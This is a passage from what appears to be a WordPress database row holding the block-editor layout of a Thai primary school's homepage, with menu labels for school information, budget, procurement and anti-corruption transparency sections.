(306,1,'2024-07-31 10:50:34','2024-07-31 03:50:34','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 